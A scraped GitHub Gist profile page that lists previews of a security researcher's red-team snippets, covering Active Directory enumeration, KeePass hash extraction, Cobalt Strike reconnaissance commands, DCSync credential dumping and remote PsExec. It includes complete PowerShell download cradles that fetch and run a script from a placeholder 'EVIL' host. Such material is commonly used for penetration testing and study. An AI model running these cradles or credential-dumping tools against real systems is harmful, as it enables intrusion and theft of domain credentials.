Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
geeking out about Kerberos

Will HarmJ0y

💭
geeking out about Kerberos
View GitHub Profile
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Mar 1, 2021
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active Feb 25, 2021
PowerView-2.0 tips and tricks
View PowerView-2.0-tricks.ps1
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
@HarmJ0y
HarmJ0y / keepass2john.py
Created Jun 30, 2016
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
View keepass2john.py
#!/usr/bin/python
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@HarmJ0y
HarmJ0y / Find-KeePassconfig.ps1
Created Jul 4, 2016
Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.
View Find-KeePassconfig.ps1
function Find-KeePassconfig {
<#
.SYNOPSIS
Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@HarmJ0y
HarmJ0y / Jenkinsfile
Created Nov 2, 2020
Rubeus Jenkinsfile
View Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
@HarmJ0y
HarmJ0y / Invoke-DCSync.ps1
Last active Feb 2, 2021 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
View Invoke-DCSync.ps1
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
@HarmJ0y
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Jan 22, 2021
ConvertFrom-UserParameter.ps1
View ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
<#
.SYNOPSIS
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View Invoke-Psexec.ps1
function Invoke-PsExec {
<#
.SYNOPSIS
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the